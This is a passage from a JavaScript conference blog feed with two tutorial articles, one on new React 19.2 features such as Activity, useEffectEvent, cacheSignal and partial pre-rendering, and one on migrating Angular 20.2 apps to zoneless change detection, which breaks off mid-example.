Preface

The changes to React 19.2 can be broken down into three core categories:

  • Updates to the React core library
  • Changes to React DOM, the package that enables React to update and render UI components to the web browser by interacting with the browser’s Document Object Model
  • Improvements to existing features from previous changes, such as batched Suspense updates

I’m keeping these categories separate because React isn’t limited to the web. For example, Meta once maintained react-360 for VR content, though it was deprecated in 2020. Today, React can render to formats such as PDF and the Command Line Interface (CLI), among others. There’s a whole host of options that can be found in the chentsulin/awesome-react-renderer GitHub repository. As a result, updates to the core library provide benefits that extend beyond web applications.

What’s new in the Core Library?

The <Activity /> Component

In declarative, state-driven architectures like React, the UI reflects the current state at any given time. To help illustrate this, imagine a dashboard application with a collapsible sidebar menu. Users often interact with such a UI by toggling the visibility of the sidebar based on their needs. Conditional rendering lets you express how different states map to different UI structures.

For example:

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false)

 return (
   <>
     {isVisible && <Sidebar/>}
     <button onClick={() => setIsVisible((state) => !state)}>Toggle Show Sidebar</button>
   </>
 )
}

When isVisible transitions from true to false, the component unmounts, and all Effects are destroyed, which cleans up any active subscriptions. No subsequent rendering or state changes can occur.

But by taking this approach, you’re missing out on a couple of features. For instance, if you wanted to temporarily hide a sidebar, but maintain its state (like the open tabs, the scroll position, the form inputs), you only have two options:

  1. Unmount the component → state lost, effects destroyed.
  2. Hide the component with CSS → state preserved, but effects (like subscriptions, event listeners, polling) continue running in the background, wasting resources.

Because React is just JavaScript, there was no built-in way to visually hide something and safely suspend its effects.

Until now. The new <Activity /> component lets you hide and later restore a component, preserving the internal state of its child components.

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false);

 return (
   <>
     <Activity mode={isVisible ? "visible" : "hidden"}>
       <Sidebar />
     </Activity>
     <button onClick={() => setIsVisible((state) => !state)}>
       Toggle Show Sidebar
     </button>
   </>
 );
};

When the mode prop is set to hidden, the child components are hidden using the display: none CSS property, which removes the elements from the layout and frees the space they occupied. This is different from the visibility: hidden CSS property, which hides elements but still reserves their space in the layout.

While hidden, child components continue to re-render in response to new props, but at a lower priority compared to visible content.

When the boundary becomes visible again, React reveals the child components with their previous state restored and re-creates their Effects. In other words, until we choose to make the component visible again, no unwanted side effects run.

In practice, when the <Sidebar /> component is in mode="visible", any navigation items that are expanded or collapsed will preserve their state. If the sidebar becomes hidden and then visible again, those items will remain in the same open or closed state they were in before.

Another way to see this is that the <Activity /> component manages background UI processes. Instead of discarding interface elements that are temporarily out of view, React shifts them into a controlled, low-priority state. The idea is closer to an operating system moving a task to the background queue; its memory and context remain intact, and it can still perform lightweight updates when needed, but it yields most of the CPU to the active, foreground tasks.

Preparing content by pre-rendering with <Activity />

Sometimes you don't just want to hide content; you want to prepare it. The <Activity /> component can pre-render components that will soon become visible.

This has great implications for dependency lazy loading or data pre-fetching, leading to reduced loading times.

For example, let's assume we have a sidebar with items defined and loaded from a CMS. If we wanted to prefetch data before it becomes visible, we could render it inside an <Activity mode="hidden"> boundary.

This allows React to start fetching data in the background using the use() hook. So by the time users open the sidebar, the data is already available and rendered, and it feels instant.

const sidebarDataPromise = fetchSidebarData()

function Sidebar() {
 const data = use(sidebarDataPromise)
 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

TanStack Query gotchas

The caveat to effects not running in "hidden" mode is that any data fetching that relies on an effect cannot take advantage of the pre-rendering capabilities of the <Activity /> component. This includes, but is not limited to, the useQuery hook from TanStack Query, which uses useEffect under the hood. To use this pattern with TanStack Query, which also caches the fetched data in memory and guards against refetching non-stale data, you can reach for queryClient.ensureQueryData (or queryClient.prefetchQuery).

const SIDEBAR_QUERY_KEY = 'sidebar';

function Sidebar() {
 const queryClient = useQueryClient()

 const data = use(queryClient.ensureQueryData({
   queryKey: [SIDEBAR_QUERY_KEY],
   queryFn: fetchSidebarData,
 }))

 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

An added benefit of pre-fetching with TanStack query here is that any other components subscribing to the same query key will benefit from the data having a warm cache ready to go.

The useEffectEvent Hook

If you’ve ever written a useEffect that connects to an external system, say a WebSocket, a stream, or a DOM event, you’ve probably had to battle the dependency array. The typical problem is that you want to react to something external, but the effect keeps re-running every time one of your props or state values changes. You either end up reconnecting too often or disabling the lint rule, which may leave you in the dark as the dependencies continue to grow and evolve.

Take this great example from the React Docs: you’re building a chat app, and when a user joins a new room, you want to show a notification once the connection is ready:

function ChatRoom({ roomId, theme }) {
 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => {
     showNotification('Connected!', theme);
   });
   connection.connect();
   return () => connection.disconnect();
 }, [roomId, theme]);
}

This looks fine, but there’s a subtle issue. If the user switches between light and dark themes while the chat is connected, the entire effect re-runs, disconnecting and reconnecting the socket, just to show the notification with the right color. It’s probably not what you were going for. The connection should only reset when roomId changes, not because of theming. What most would do in this case is remove the theme from the dependency array. However, that results in a linter warning, and you ultimately will have to disable it with a comment.

This is where useEffectEvent shines. It lets you separate the “event reaction” logic from the “effect setup” logic, so React can handle updates to values like theme without forcing a teardown and reconnect.

Here’s the same example rewritten:

function ChatRoom({ roomId, theme }) {
 const onConnected = useEffectEvent(() => {
   showNotification('Connected!', theme);
 });

 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => onConnected());
   connection.connect();
   return () => connection.disconnect();
 }, [roomId]); // ✅ Effect runs only when roomId changes
}

The key difference is that the onConnected callback always “sees” the latest theme, but the effect itself remains stable because the event handler’s identity never changes. React treats useEffectEvent callbacks as stable by design, meaning they don’t need to appear in dependency arrays.
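The mechanics behind that stability can be sketched without React at all (an illustrative model, not React's implementation): keep the handler's identity fixed while it reads from a mutable "latest" slot.

```typescript
// Framework-free model of the idea behind useEffectEvent (illustrative, not
// React's implementation): the handler's identity never changes, yet it
// always reads the latest captured value.
function makeStableEvent<T>(initial: T) {
  let latest = initial;
  const handler = () => latest;                  // stable identity
  const update = (next: T) => { latest = next; }; // refresh the captured value
  return { handler, update };
}

const { handler, update } = makeStableEvent("light");
const seenByEffect = handler; // what a long-lived effect would close over

update("dark");               // the "theme" changed; the effect did not re-run
console.log(seenByEffect());  // "dark": latest value through the same handler
```

Because the identity never changes, an effect closing over such a handler has no reason to re-run when the underlying value does.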

This pattern is incredibly useful in real apps. Think about analytics events, WebSocket subscriptions, or integrations with browser APIs. You often need to respond to events (connection open, visibility change, playback start, etc.) without tearing down your entire effect tree every time an unrelated prop changes.

So if you’ve been in the habit of sprinkling eslint-disable-next-line react-hooks/exhaustive-deps above every useEffect that listens to external events, this new addition to React’s collection of hooks finally makes that unnecessary. Just make sure to upgrade your eslint-plugin-react-hooks to latest.

Improving cache management with cacheSignal in React Server Components

The cache() function, used exclusively with React Server Components (RSCs), allows you to memoize the results of data fetching or expensive computations across requests. Starting with React 19.2, the core library introduces a new companion API, cacheSignal(), to complement the existing cache() API and provide greater control over cache lifecycles.

In short, cacheSignal() gives you an AbortSignal that matches the cache’s lifetime. When the cache expires, the signal is aborted, so any ongoing operations like fetch() calls can be cancelled smoothly.

This idea isn’t new – using abort signals is a common practice on the client side, with fetch requests that occur within effects and abort signals that allow for the correct cleanup to occur so that when a component unmounts, there aren’t any wasted resources. Now it’s built into React’s cache and rendering system.

Here’s an example:

const getUser = cache(async (id: string) => {
 const signal = cacheSignal();

 const response = await fetch(`/users/${id}`, { signal });

 if (!response.ok) {
   throw new Error(`Failed to fetch user: ${response.status}`);
 }

 return response.json();
});

export async function UserProfile({ id }: { id: string }) {
 const user = await getUser(id);

 return (
   <section>
     <h2>{user.name}</h2>
     <p>{user.email}</p>
   </section>
 );
}

In this example:

  • getUser is wrapped in cache(), which deduplicates calls with the same arguments within React’s server cache scope.
  • Inside getUser, cacheSignal() returns an AbortSignal that React will abort once rendering is conclusive. This occurs in one of three scenarios:
    • React has successfully completed rendering.
    • The render was aborted.
    • The render has failed.
  • Passing that signal to fetch() ensures that any pending network requests are immediately canceled if the render is aborted, fails, or completes.

While cacheSignal() currently only operates within the RSC environment and returns null on the client, the React team has indicated in the official docs that it plans to extend its availability to Client Components in future releases.
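The lifecycle can be modeled in plain TypeScript (an illustrative sketch, not React's implementation): the cache owns an AbortController, and ending the cache's lifetime aborts every operation tied to its signal.

```typescript
// Plain-TypeScript model of cacheSignal() semantics (illustrative, not
// React's implementation): the cache owns an AbortController, and ending
// the cache's lifetime aborts every operation tied to its signal.
class RenderCache {
  private controller = new AbortController();

  // Stand-in for calling cacheSignal() inside a cache()-wrapped function.
  get signal(): AbortSignal {
    return this.controller.signal;
  }

  // Called when rendering completes, fails, or is aborted.
  dispose(): void {
    this.controller.abort();
  }
}

const renderCache = new RenderCache();
const signal = renderCache.signal;
// fetch(`/users/1`, { signal }) started during the render would be
// cancelled automatically once dispose() runs.

console.log(signal.aborted); // false: the render is still in progress
renderCache.dispose();
console.log(signal.aborted); // true: pending work tied to it is cancelled
```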

Performance profiling gets new powers

Chrome provides the ability to customize performance data via its extensibility API, which, with React 19.2, is finally being taken advantage of. Previously, the performance panel showed flame charts for JavaScript, layout, and paint events, but not what React was doing internally. You could see when the browser was busy, but not why.

The React DevTools Profiler, added in version 16.5, helped fill some gaps, but only from React’s point of view. It showed which components rendered, how long each render took, and what triggered them. This was useful for seeing what React did, but we were still missing info on when or how it worked with the browser. The Profiler was separate from the browser’s performance timeline, so you couldn’t match React’s scheduling with main-thread tasks or paint events.

This separation made it hard to understand concurrency and scheduling. For example, if interactions were slow, you couldn’t tell if React was blocked by the browser, yielding work, or just handling a low-priority update.

React 19.2

Figure 1: React Performance Tracks (Source)

React 19.2 changes this by adding React Performance Tracks to Chrome DevTools’ Performance panel. This bridges the gap between React’s scheduler and the browser’s timeline. Now, you can see React’s priorities, renders, and effects right next to standard performance data, giving you a clear view of how React works frame by frame.

The tracks are broken down into the Scheduler track and the Components track:

  • Scheduler: visualizes React’s internal priorities like blocking and transition updates, showing when work starts, pauses, and completes.
  • Components: shows which components are rendering or running effects.
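These custom tracks build on the Performance API's extensibility hook: a `devtools` object inside the standard User Timing `detail` payload. The field names below follow Chrome's extensibility API as I understand it; treat them as an assumption and verify against the official docs before relying on them.

```typescript
// Sketch: attributing a span of work to a custom track in Chrome's
// Performance panel. The devtools payload shape is an assumption based on
// Chrome's extensibility API; the mark/measure calls are standard User Timing.
performance.mark("work-start");
// ... work you want to attribute to a custom track ...
performance.mark("work-end");

performance.measure("render sidebar", {
  start: "work-start",
  end: "work-end",
  detail: {
    devtools: {
      dataType: "track-entry",  // render this measure on a custom track
      track: "My React Track",  // the track's name in the Performance panel
      color: "primary",
    },
  },
});

console.log(performance.getEntriesByName("render sidebar").length); // 1
```

React 19.2 emits entries like these for you, which is why its Scheduler and Components tracks appear inline with the browser's own timeline data.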

What’s new with React DOM?

Partial Pre-rendering

Partial pre-rendering first came as an experimental feature in Next.js 14. And now, with React 19.2, it’s shipping as part of the react-dom package, bringing a new rendering model to React that allows you to combine the benefits of static and dynamic rendering.

This provides a new level of flexibility, combining the performance benefits of Static Site Generation (SSG), where an entire route is rendered to static HTML, with the freshness of Server-Side Rendering (SSR), which re-renders the page on each request.

In a nutshell, with Partial Pre-rendering:

  • React pre-renders as much of the page as possible ahead of time (the static shell).
  • The parts that depend on live data or user-specific information are left as “holes” (Suspense boundaries).
  • When a request arrives, React resumes rendering the postponed (dynamic) parts on the server from the saved state, then streams the completed output to the browser.

This can be great for use cases such as E-commerce product pages, where product details like the title, description, and images rarely change, whereas pricing, localization, and stock generally do. With partial pre-rendering, you can serve a cached static shell instantly from a CDN to ensure the initial UI renders quickly and is close to the end user. Then, you can resume rendering only the dynamic components, such as price and stock, when the request hits the server.
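The shell-plus-holes idea can be sketched framework-free (prerenderShell and resume are illustrative names, not the react-dom API): static parts are computed once and are cacheable, while holes stay as functions that run per request.

```typescript
// Framework-free sketch of partial pre-rendering (illustrative names, not
// the react-dom API): static parts are fixed at build time; "holes" remain
// functions that are evaluated per request.
type Part = string | (() => string);

function prerenderShell(parts: Part[]) {
  // "Build time": from here on, the static strings never change.
  return function resume(): string {
    // "Request time": only the holes are evaluated.
    return parts.map((p) => (typeof p === "string" ? p : p())).join("");
  };
}

let stock = 3;
const productPage = prerenderShell([
  "<h1>Mechanical Keyboard</h1>",     // static shell, servable from a CDN
  () => `<p>In stock: ${stock}</p>`,  // dynamic hole, rendered per request
]);

console.log(productPage()); // <h1>Mechanical Keyboard</h1><p>In stock: 3</p>
stock = 2;
console.log(productPage()); // the hole re-renders; the shell does not
```

In real React, the holes are Suspense boundaries whose postponed render state is saved and resumed on the server, then streamed to the browser.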

Wrapping up

Beyond the core library and DOM package updates, the React team sprinkled in a few updates around batching suspense boundaries, web stream support for Node, eslint-plugin-react-hooks, and more!

As of October 20, 2025, 66.8% of websites using React are still on the 2017 release, version 16, and 10.9% are on version 18, according to W3Techs. It will be some time before these features reach scale across the majority of production-grade applications. But that doesn't mean it isn't important to get familiar with what's possible and to learn the concepts early. Isn't that the perfect excuse to play around with them in a side project?

]]>
No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 https://javascript-conference.com/blog/angular-20-zoneless-mode-performance-migration-guide/ Thu, 09 Oct 2025 08:40:28 +0000 https://javascript-conference.com/?p=108437 Zone.js has been at the heart of Angular’s change detection since the beginning, but the framework is moving forward. With the introduction of zoneless mode and signals, Angular now supports a reactivity model that is simpler, faster, and more explicit. This article shows what changes when you drop Zone.js, how to refactor your app, and how to work effectively with the new change detection model. You'll see what breaks, what improves, and how to rethink your app's reactivity when Zone.js is no longer in control.

The post No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 appeared first on International JavaScript Conference.

]]>
For years, Zone.js powered Angular’s “magic refresh,” keeping apps in sync without extra effort. It worked by patching async browser APIs and notifying Angular whenever something might have changed. While this made development smoother, it also came with trade-offs: unnecessary change detection cycles and debugging complexity. Now, Angular 20.2 marks a turning point. Zoneless mode is stable, opening the door to a leaner and more predictable way of building Angular apps.

What is Zone.js and How Does it Work?

Before we talk about going zoneless, let’s recall what Zone.js actually is and does. It’s a library that monkey-patches asynchronous browser APIs such as setTimeout, promises, DOM events, and HTTP requests. Each time one of these is completed, it notifies Angular that “something might have changed.” But Zone.js couldn’t provide details about what changed or where. As a result, Angular had to trigger change detection across the whole component tree to make sure the UI stayed in sync.
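That patching pattern can be reduced to a few lines (a minimal sketch of the idea, not Zone.js itself): wrap every async callback so the framework is notified after it runs.

```typescript
// Minimal sketch of the Zone.js idea (illustrative, not Zone.js itself):
// every async callback is wrapped so the framework hears "something might
// have changed" after the callback finishes.
let cdRuns = 0;
function runChangeDetection() {
  cdRuns++; // in Angular this would check the whole component tree
}

function wrapTask<A extends unknown[]>(fn: (...args: A) => void) {
  return (...args: A) => {
    fn(...args);          // run the application's callback first
    runChangeDetection(); // then tell the framework a task finished
  };
}

// A patched setTimeout would deliver its callbacks through wrapTask; here we
// invoke the wrapped callback directly to keep the sketch synchronous.
const onTimeout = wrapTask(() => { /* some app code */ });
onTimeout();
console.log(cdRuns); // 1
```

Note that the wrapper has no idea what changed, only that something ran, which is exactly why Angular had to re-check the entire tree on every notification.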

That trade-off defined much of the Angular developer experience. On the bright side, Zone.js made things feel almost magical, the UI updated automatically whenever async code finished, and you didn’t have to think about it. This simplicity was especially appealing in Angular’s early days, when developers could focus on building features instead of worrying about change detection triggers.

But the magic came with a price. Zone.js treated every async event as a possible change, which meant Angular often did more work than necessary. Over time, that extra overhead slowed apps down and made debugging harder.

For years, developers enjoyed the “magic” of Zone.js but also dealt with its drawbacks. Here is some good news: Angular has been evolving to eliminate this dependency, and with Angular 18, we see the first experimental steps toward a zoneless future.


Angular Zoneless – From Experimental to Stable

The idea of running Angular without Zone.js has been a long-awaited change in the framework’s evolution. Back in Angular 18, the team introduced the first experimental APIs for zoneless mode, which allowed us to explore a world where change detection was no longer tied to Zone.js patching every asynchronous operation in the browser.

With the release of Angular 20.2, these APIs became stable, and we can now confidently build production applications in zoneless mode. Instead of relying on Zone.js, we work with an explicit change detection model where updates are triggered by signals, template events, async pipes, and manual checks when necessary.

This naturally raises the next question: why should we go zoneless, and what do we actually gain by removing Zone.js from our applications?

Why go zoneless?

So why should we drop Zone.js now that we finally can? The main reasons come down to leaner applications, improved performance, and more predictable behavior.

Benefits of going zoneless

  • Reduced bundle size and faster initial load: Without Zone.js, the bundle shrinks by about 33 KB. That’s not huge on its own, but it translates directly into a faster initial load, since the browser no longer has to download and parse the library.

Initial bundle size with Zone.js

Figure 1: Initial bundle size with Zone.js

Initial bundle size in zoneless app

Figure 2: Initial bundle size in zoneless app

  • Better performance: Zone.js often triggered unnecessary change detection cycles, even when no data had changed. Zoneless mode removes that overhead. Change detection now runs only when it actually needs to, giving us more predictable and performant rendering.
  • Easier debugging: With Zone.js gone, stack traces are no longer wrapped in Zone-specific frames. You get a full, accurate stack trace that points exactly to where something happened. No more extra noise. This makes debugging and profiling significantly easier.
  • Full control over reactivity: In zoneless Angular, the developer explicitly decides when the UI should update. This is a major shift – instead of relying on Zone.js “magic,” you know exactly what triggers change detection and when it happens. That makes the app’s reactivity model both transparent and intentional.

Trade-offs to keep in mind

  • You may need to adjust your mental model. Without automatic change detection, you must adopt a more deliberate strategy for updating the UI. That means paying more attention to using signals, async pipes, or calling markForCheck when necessary.
  • Migration effort: migrating a large app can take time, especially if it's heavily tied to Zone.js behaviors and doesn't use signals or the OnPush change detection strategy.

Create a zoneless project

Starting a zoneless project is surprisingly simple. In Angular v20.2, you can enable zoneless mode directly when you are creating a new project using CLI:

Create zoneless project with zoneless flag

Figure 3: Create zoneless project with zoneless flag

If you skip the flag, the Angular CLI will ask you a question during project setup:

Create zoneless app - CLI zoneless question

Figure 4: Create zoneless app – CLI zoneless question

Select “Yes” and you will get a project fully Zone.js free!

Migration to zoneless

If you already have an Angular project and want to migrate to zoneless, the process takes a few steps:

  • In app.config.ts, swap: provideZoneChangeDetection({ eventCoalescing: true }) → provideZonelessChangeDetection()

Switch to zoneless provider in app.config.ts

Figure 5: Switch to zoneless provider in app.config.ts

  • Remove zone.js from angular.json build and test configs.

Remove zone.js from build config in angular.json

Figure 6: Remove zone.js from build config in angular.json

Remove zone.js and zone.js/testing from test config in angular.json

Figure 7: Remove zone.js and zone.js/testing from test config in angular.json

  • Delete imports: import zone.js and import zone.js/testing.
  • Uninstall Zone.js. Once nothing depends on it anymore, uninstall it.

Uninstall Zone.js

Figure 8: Uninstall Zone.js

  • Verify in the browser. Open your app in the browser, open the console, and type Zone. You should get an error: Zone is not defined. That confirms Zone.js has been fully removed.

Checking in the browser console if Zone.js is still available in the app

Figure 9: Checking in the browser console if Zone.js is still available in the app
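Putting the first migration step together, a minimal zoneless app.config.ts looks roughly like this (a sketch; a real config will also carry your other providers, such as the router):

```typescript
// app.config.ts after the provider swap (sketch)
import { ApplicationConfig, provideZonelessChangeDetection } from '@angular/core';

export const appConfig: ApplicationConfig = {
  providers: [
    // replaces provideZoneChangeDetection({ eventCoalescing: true })
    provideZonelessChangeDetection(),
  ],
};
```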

How Change Detection Works Without Zone.js

Once Zone.js is gone, Angular no longer “guesses” when to refresh the UI. Instead, the framework listens to specific, intentional triggers that tell it exactly when change detection should run. So what are the actual triggers that make Angular run change detection without Zone.js?

Change detection triggers

  • Bound host or template event listeners:

<button class="refill-button" (click)="refillRum()">Refill Barrel</button>

@HostListener('click')
refillRum(): void {
  this.rumService.refillRum();
}
  • Async pipe calls ChangeDetectorRef.markForCheck() under the hood whenever the observed value changes, ensuring your template reflects the new data.
@for(location of treasureLocations$ | async; track location.id) {
  <!-- Treasure location content -->
}
  • Updating a signal used in a template
  • ComponentRef.setInput(): When you programmatically set an input on a dynamically created component, Angular marks that view as dirty and schedules change detection.
  • Manual call of ChangeDetectorRef.markForCheck(): While Angular handles change detection automatically in most cases, you can still force it with markForCheck(), ensuring Angular picks up changes it wouldn’t catch otherwise.

It’s important to understand that going zoneless doesn’t rewrite Angular’s change detection model from scratch. The two familiar strategies, Default and OnPush, are still in place, and their behavior hasn’t changed. What changed is when the change detection process starts.

  • Default strategy: With the default mode, Angular still walks the component tree from top to bottom, checking each view to see if updates are needed. Zoneless or not, this part works exactly the same.


Figure 10: Default change detection – Trigger change detection by click event

In Figure 10, we see a zoneless application’s component tree, where all components use the default change detection strategy. When a user clicks a button inside one of the child components, the click event triggers change detection.

In the next step (Figure 11), Angular marks the component where the click happened, together with all of its ancestors up to the root, as dirty. Then Angular runs the change detection process (Figure 12).

The key difference is only in how change detection is triggered. Zone.js used to fire it on every patched async operation, while zoneless relies on explicit triggers like user events, signals, or async pipe.

Finally, it’s worth clarifying that Angular has never “re-rendered” components. That’s a common misconception. Angular simply checks bindings and, if a change is detected, updates only the affected DOM nodes.


Figure 11: Default change detection – Mark View Dirty


Figure 12: Default change detection – components checked
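This “check the bindings, update only what changed” behavior can be pictured with a small sketch in plain TypeScript. It is purely conceptual and not Angular’s actual internals: each binding remembers the value it last rendered, and a check pass reports only the bindings whose values differ.

```typescript
type Binding = { name: string; read: () => unknown; last: unknown };

// "Checking" a view: compare each binding's current value with the value
// rendered last time, and report only the bindings that actually changed.
function checkBindings(bindings: Binding[]): string[] {
  const updated: string[] = [];
  for (const b of bindings) {
    const current = b.read();
    if (current !== b.last) {
      b.last = current;       // remember what was "rendered"
      updated.push(b.name);   // only this DOM node would be touched
    }
  }
  return updated;
}
```

Running a second pass without any state change reports nothing, which is why a check is cheap when no bindings have changed.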

  • OnPush strategy: With OnPush, Angular checks only those components that have been explicitly marked as dirty.


Figure 13: onPush change detection – trigger change detection by click event

Let’s look at a mixed setup: some components use OnPush, others stick to the default strategy (Figure 13). A user clicks a button inside an OnPush component. Angular marks that component and its ancestors dirty, same as before (Figure 14).


Figure 14: onPush change detection – Mark View Dirty

But here’s the twist. With OnPush, Angular only checks components that are actually marked as dirty. If an OnPush component isn’t marked dirty, Angular skips it entirely, along with all of its children (Figure 15). In our case, the parent of the clicked component is OnPush and marked dirty, so Angular checks it, and because that parent has another child using the default strategy, that sibling gets checked as well.


Figure 15: onPush change detection – components checked

  • Local change detection with OnPush + Signals: Imagine we have a component tree where all components use OnPush change detection and rely on signals in their templates (Figure 16).


Figure 16: “Local” change detection – onPush + signal change + async task

When an asynchronous task triggers a change in a signal, this update does not mark all ancestors as dirty. Instead, only the component consuming that signal (the “consumer”) is tagged as dirty.


Figure 17: “Local” change detection – Marking consumer dirty and ancestors with flag HasChildViewsToRefresh

But what about its ancestors? Ancestors aren’t marked as dirty, but instead receive a special marker called HasChildViewsToRefresh (Figure 17). This marker tells Angular that the component itself is clean, but it has children that need to be refreshed.

During change detection, Angular starts traversal from the root, skipping any OnPush components that aren’t dirty. However, when it encounters a component with the HasChildViewsToRefresh flag, it knows to continue down into its subtree. In this way, Angular bypasses clean components and focuses only on the path that leads to the consumer of the changed signal, ensuring that updates are applied exactly where they are needed (Figure 18).

It’s important to note that this optimization only works if the signal update isn’t triggered by a mechanism that already marks components as dirty (for example, an event listener). In that case, the ancestors are marked both as dirty and with the HasChildViewsToRefresh flag, which means Angular will check them as well.


Figure 18: “Local” change detection – Angular runs check detection only in component where signal value changed

Summing up this section: a trigger starts the process, and the strategy decides its scope. Now it’s time to see what preparation is needed before going zoneless.

Preparing for Zoneless

If we want to go zoneless, we first need to prepare our apps. It’s not just about removing Zone.js; we also need to make sure our components know how to notify Angular about changes. In other words, we have to replace the “magic” that Zone.js gave us with explicit signals, async pipes, or markForCheck calls. Once that’s in place, the transition becomes smooth and more predictable.

The very first step is to switch all components to the OnPush change detection strategy. Why? Because it immediately reveals what will stop working once Zone.js is gone. By forcing Angular to update only when explicitly notified, we can clearly see which parts of the app rely on Zone.js magic, and fix them before the actual migration.

Let’s look at some examples to see the most common issues you’ll run into, and which solutions will continue to work just fine. All examples below are shown using Angular 20.2, since that’s the version where zoneless mode is stable and safe to adopt.


Figure 19: View of an example component showing ship crew members

I’ll start with a simple example: a component that displays the ship crew. Initially, everything works fine. We fetch the crew list with an HTTP request, subscribe to it in the component, and assign the result to a crewMembers variable. The template first shows the loading message, and then the data.

Listing 1:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  protected isLoading = true;
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
      .pipe(
        finalize(() => this.isLoading = false),
        takeUntilDestroyed(this.destroyRef)
      )
      .subscribe(members => {
        this.crewMembers = members;
      });
  }
}

But once we switch the component to the OnPush change detection strategy, things suddenly break. Instead of the crew list, we keep seeing the “loading” state, even though the HTTP call has already completed. Why does this happen?


Figure 20: View of an example component with loading state, when onPush strategy was turned on

Previously, Zone.js automatically tracked async tasks, such as HTTP requests. When the request finished, it triggered change detection for us. Without Zone.js, nothing notifies Angular that the data has arrived, so the UI never updates.

At this point, we have to trigger change detection ourselves. One option is to inject ChangeDetectorRef and call markForCheck after updating crewMembers. You can use it if you have to, but there are usually better options.

Listing 2 – markForCheck:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent implements OnInit {
  protected crewMembers: CrewMember[] = [];
  protected isLoading = true;
  private crewService = inject(CrewService);
  private destroyRef = inject(DestroyRef);
  private changeDetector = inject(ChangeDetectorRef);

  ngOnInit(): void {
    this.crewService.getCrewMembers()
      .pipe(
        finalize(() => this.isLoading = false),
        takeUntilDestroyed(this.destroyRef)
      )
      .subscribe(members => {
        this.crewMembers = members;
        this.changeDetector.markForCheck();
      });
  }
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(!isLoading) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>              
      }
    </ul>
  } @else {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

A much better approach is to use the async pipe. It eliminates the need for manual subscription logic in your component and guarantees that Angular updates the view whenever data changes.

Listing 3 – Async Pipe:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent, AsyncPipe],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  crewMembers$ = this.crewService.getCrewMembers();
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @let crewMembers = crewMembers$ | async;
  @if(crewMembers) {
    <ul class="crew-list">
      @for(member of crewMembers; track member.id) {
                  <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

We can also take advantage of toSignal. With it, we transform an observable into a signal inside our component. Whenever the observable emits a new value, the signal’s value is updated, and Angular reacts right away. Subscriptions are managed under the hood, so we avoid the extra boilerplate of manual unsubscribe logic. In the template, we just use our signal instead of the observable, but we have to call it with (), e.g., crewMembers(), to get the signal’s value.

Listing 4 – Signals:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  private crewService = inject(CrewService);
  crewMembers = toSignal(this.crewService.getCrewMembers());
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crewMembers()) {
    <ul class="crew-list">
      @for(member of crewMembers(); track member.id) {
          <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  } @else {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

Beyond async pipes and signals, there’s also a new player: httpResource. It’s still experimental, but it already works seamlessly in a zoneless environment. Why? Because it doesn’t rely on Zone.js at all, it exposes its state through signals, making it a natural fit for the new change detection model.

Listing 5 – httpResource:

@Component({
  selector: 'app-crew-widget',
  imports: [AddCrewModalComponent, ConfirmDialogComponent],
  templateUrl: './crew-widget.component.html',
  styleUrls: ['./crew-widget.component.scss'],
  changeDetection: ChangeDetectionStrategy.OnPush
})
export class CrewWidgetComponent {
  crew = httpResource<CrewMember[]>(() => `http://localhost:3000/crew`);
}

Template:

<div class="crew-widget">
  <div class="header">
    <h2>Crew Members</h2>
  </div>
  @if(crew.hasValue()) {
    <ul class="crew-list">
      @for(member of crew.value(); track member.id) {
    <!-- Member content -->
      }
      @empty {
        <li class="empty-crew">No crew members aboard yet.</li>
      }
    </ul>
  }
  @if(crew.isLoading()) {
    <div class="loading">
      <span>Loading crew members...</span>
    </div>
  }
</div>

Another common pitfall comes from using setTimeout or setInterval. In a zoneless app, they no longer trigger change detection automatically. If your code relies on them, you’ll need to adjust it before migrating. Depending on the case, you can either call markForCheck to notify Angular manually or update a signal value directly. Just remember, for the signal update to refresh the UI, it has to be read in the template. If you’re working with an observable, ensure it’s consumed via the async pipe, so updates are picked up correctly.

Listing 6 – setInterval not triggering change detection in zoneless app:

rumStockValue = 100;

//some code

setInterval(() => {
  this.rumStockValue = this.simulateRumConsumption();
}, 10000);

Listing 7 – setInterval with signal value change:

rumStockValue = signal(100);

//some code

setInterval(() => {
